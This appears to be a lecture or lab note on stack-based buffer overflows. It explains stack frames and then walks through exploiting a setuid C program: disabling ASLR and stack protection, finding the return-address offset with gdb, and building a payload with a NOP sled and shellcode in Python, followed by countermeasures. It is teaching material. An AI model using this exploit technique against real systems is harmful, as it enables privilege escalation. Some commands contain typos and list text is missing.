6_Buffer_Overflow
To understand completely how buffer overflow attacks work, we nee to understand how data is arranged inside a process.
Take the following C code:
int x = 100; // Data segment
int main(){
int a = 2; // Stack
float b = 2.5; // Stack
static int y; // BSS
int* prt = (int*) malloc(2*sizeof(int)); // Heap
ptr[0]=5; // Heap
ptr[1]=6; // Heap
free(ptr);
return 1;
}
The memory is divided in 5 segments:
where:
Buffer overflow can happen on both stack and heap.
We'll look at stack-based buffer overflow.
As said before, stack is used for storing data used in function invocations.
Since a program is a set of function calls, there may exist a way to handle this. Indeed, whenever a function is called, some space is allocated for it on the stack.
Consider the following sample code for function func():
void func(int a, int b){
int x, y;
x = a + b;
y = a - b;
}
Now, when func() is called a block of memory space will be allocated on the top of the stack and it's called stack frame.
The structure of a stack frame is has four important regions:
return instruction) to know where to return to.Since func() need to access the arguments and the local vars, it has to know their memory addresses.
Unfortunately, such addresses cannot be decide at compilation time, because compiler cannot predict the run-time status of the stack.
Thus, a new register has been introduced in the CPU, called frame pointer.
This register points to a fixed location in the stack frame, so the address of arguments and variables can be derived by using such register plus an offset.
In this way, the offset can be decided by the compiler and the actual address of the data can change during runtime, since it depends on frame pointer which depend on where a stack frame is allocated.
movl 12(%ebp), %eax;
movl 8(%ebp), %edx;
addl %edx, %eax;
movl %eax, -8(%ebp);
where:
ebp stands for frame pointer.eax, edx are general purpose registers.a is located at ebp + 8 and b is located at ebp + 12.Typically, functions can call other functions within their scopes. Whenever a function is called, a new stack frame is allocated on the top of the stack; when the function returns, the space for the stack frame is released. That's why we need the previous frame pointer: in this way, we are able to utilize function call chain.
The buffer overflow on stack happens whenever we overwrite some portion of the stack above function local variable. In this way, we are modifying important values such as the return address and the previous frame pointer.
In this scenario, can happen that:
Before starting the experiment, we need to turn off all the countermeasures:
sudo systcl -w kernel.randomize_va_space=0
gcc -m32 -o stack -z execstack -fno-stack-protector stack.c
sudo chown root stack
sudo chmod 4755 stack
/* stack .c */
int foo(char* str){
char buffer[100];
strcpy(buffer,str); // Here there's the buffer overflow problem
return 1;
}
int main(int argc, char** argv){
char str[400];
FILE* badfile;
badfile = fopen("badfile","r");
fread(str,sizeof(char),300,badfile);
foo(str);
printf("Returned Properly\n");
return 1;
}
Since we are writing 300 bytes inside the buffer local variable, which can store 100 bytes, a buffer overflow will occur.
So, we have to decide what we have to put in the badfile in order to make the program continue and execute malicious code.
We place our malicious code at the end of the file and by overwriting the return address field with the address of the malicious code, we can execute our code at the end of foo() function.
We need 2 steps:
foo()) and the return address.In order to solve this challenge, we leverage the power of gdb to know the actual offset.
We set a breakdown point, by using
gdb$ b foo
Breakdown 1 at 0x804848a
gdb$ run
We can now print the value of the frame pointer ebp and the address of the buffer by:
gdb$ p $ebp
$1 = (void *) 0xffffcf58
gdb$ p &buffer
$2 = (char (*)[100]) 0xffffceec
gdb$ p/d 0xffffcf58 - 0xffffceec
$3 = 108
Now, we have that the offset is 108 + 4 = 112 , since at 108 from &buffer we have ebp. This offset will be used to set the new return address.
Now, the frame pointer is 0xffffcf58. Therefore the return address is stored in 0xffffcf58 + 4 and the first address where we can put the malicious code is 0xffffcf58 + 8 (look at stack layout).
Thus, we can put at buffer + 112 the value 0xffffcf58 + 8.
We create via python the badfile.
The python script will :
content = bytearray(0x90 for i in range(400))
start = 400 - len(shellcode)
content[start:] = shellcode
ret = 0xffffcf58 + 200
content[112:116] = (ret).to_bytes(4, byteorder=‘little’)
Here we put the new return address ret at offset 112 and since we are in a x86 Little-Endian architecture, we have to use the function to_bytes as shown above.
Notice: we have used a larger offset on ret. This is done to face the fact that gdb may push some additional data to the stack.
Notice: any results of 0xffffcf58 + nnn must not contain a zero in any of its byte, otherwise it will cause the strcpy inside foo to end the copying earlier.
And that’s it, the attack goes right.
There are several countermeasures:
strncpy(), strncat() etcBy randomizing the start location of the stack very time the code is loaded in memory, clearly the stack address changes.
Thus, it's difficult to the attacker guess the stack address in the memory and, therefore, it's difficult to guess the %ebpaddress and the address of the malicious code.
On Linux we can:
sudo systcl -w kernel.randomize_va_space=0
sudo systcl -w kernel.randomize_va_space=1
sudo systcl -w kernel.randomize_va_space=2
Since in a 32-bit machine, the stack base address can have
Since the stack-based buffer overflow need to modify the return address, if we can detect such change, we can foil the attack.
We know that to overwriting the return address we have to overwrite all the stack memory between the buffer and the return address.
So, we can put a non-predictable value (called guard) between the buffer and the return address. If this value has been modified, chances are that the return address may have also been modified.
We could manually do it in our code, but StackGuard countermeasure is already implemented in gcc.
bash & dashWe know that bash/dash drops privileges when they detect that the effective UID does not equal to the real UID. That's why we have to set the own to root to execute the malicious code as Set-UID program.
However, this can be easily defeated by setting the real UID to 0, by simply invoking setuid(0) at the begin of the shellcode.